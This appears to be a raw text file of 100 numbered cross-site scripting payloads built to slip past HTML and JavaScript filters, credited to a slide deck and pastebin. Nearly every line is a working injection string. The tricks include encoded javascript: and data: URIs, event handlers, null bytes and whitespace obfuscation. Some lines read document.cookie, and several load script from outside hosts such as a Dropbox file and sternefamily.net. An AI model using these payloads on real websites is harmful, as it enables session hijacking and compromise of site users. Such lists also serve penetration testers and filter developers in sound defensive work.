105 lines
8.1 KiB
Text
105 lines
8.1 KiB
Text
# http://slid.es/mscasharjaved/cross-site-scripting-my-love
|
|
# http://pastebin.com/u6FY1xDA
|
|
# @soaj1664ashar
|
|
#
|
|
1) <iframe %00 src="	javascript:prompt(1)	"%00>
|
|
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
|
3) <input/onmouseover="javaSCRIPT:confirm(1)"
|
|
4) <sVg><scRipt %00>alert(1) {Opera}
|
|
5) <img/src=`%00` onerror=this.onerror=confirm(1)
|
|
6) <form><isindex formaction="javascript:confirm(1)"
|
|
7) <img src=`%00`
 onerror=alert(1)

|
|
8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
|
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
|
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
|
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
|
|
12) "><h1/onmouseover='\u0061lert(1)'>%00
|
|
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
|
|
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
|
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
|
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
|
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
|
18) <iframe src=javascript:alert(document.location)>
|
|
19) <form><a href="javascript:\u0061lert(1)">X
|
|
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
|
|
21) <img/	  src=`~` onerror=prompt(1)>
|
|
22) <form><iframe 	  src="javascript:alert(1)" 	;>
|
|
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
|
24) http://www.google<script .com>alert(document.location)</script
|
|
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
|
26) <img/src=@  onerror = prompt('1')
|
|
27) <style/onload=prompt('XSS')
|
|
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
|
|
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
|
30) �</form><input type="date" onfocus="alert(1)">
|
|
31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
|
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
|
33) <iframe srcdoc='<body onload=prompt(1)>'>
|
|
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
|
35) <script ~~~>alert(0%250)</script ~~~>
|
|
36) <style/onload=<!--	> alert (1)>
|
|
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
|
|
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
|
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
|
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
|
41) <marquee onstart='javascript:alert(1)'>^__^
|
|
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
|
|
43) <iframe/%00/ src=javaSCRIPT:alert(1)
|
|
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
|
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
|
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
|
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
|
48) <a/href="javascript: javascript:prompt(1)"><input type="X">
|
|
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
|
|
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
|
51) <a href="javascript:\u0061le%72t(1)"><button>
|
|
52) <div onmouseover='alert(1)'>DIV</div>
|
|
53) <iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)">
|
|
54) <a href="jAvAsCrIpT:alert(1)">X</a>
|
|
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
57) <var onmouseover="prompt(1)">On Mouse Over</var>
|
|
58) <a href=javascript:alert(document.cookie)>Click Here</a>
|
|
59) <img src="/" =_=" title="onerror='prompt(1)'">
|
|
60) <%25<!--'%25><script>alert(1);</script -->
|
|
61) <script src="data:text/javascript,alert(1)"></script>
|
|
62) <iframe/src \/\/onload = prompt(1)
|
|
63) <iframe/onreadystatechange=alert(1)
|
|
64) <svg/onload=alert(1)
|
|
65) <input value=<><iframe/src=javascript:confirm(1)
|
|
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
|
67) http://www.<script>alert(1)</script .com
|
|
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
|
|
69) <svg><script ?>alert(1)
|
|
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
|
71) <img src=`xx:xx`onerror=alert(1)>
|
|
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
|
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
|
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
|
76) <svg contentScriptType=text/vbs><script>MsgBox+1
|
|
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
|
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
|
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
|
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
|
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
|
82) <object data=javascript:\u0061le%72t(1)>
|
|
83) <script>+-+-1-+-+alert(1)</script>
|
|
84) <body/onload=<!-->
alert(1)>
|
|
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
|
|
86) <img src ?itworksonchrome?\/onerror = alert(1)
|
|
87) <svg><script>//
confirm(1);</script </svg>
|
|
88) <svg><script onlypossibleinopera:-)> alert(1)
|
|
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
90) <script x> alert(1) </script 1=2
|
|
91) <div/onmouseover='alert(1)'> style="x:">
|
|
# unable to reproduce in IE8 or IE9
|
|
#92) <--`<img/src=` onerror=alert(1)> --!>
|
|
93) <script/src=data:text/javascript,alert(1)></script>
|
|
94) <div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
|
95) "><img src=x onerror=window.open('https://www.google.com/');>
|
|
96) <form><button formaction=javascript:alert(1)>CLICKME
|
|
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
|
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
|
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|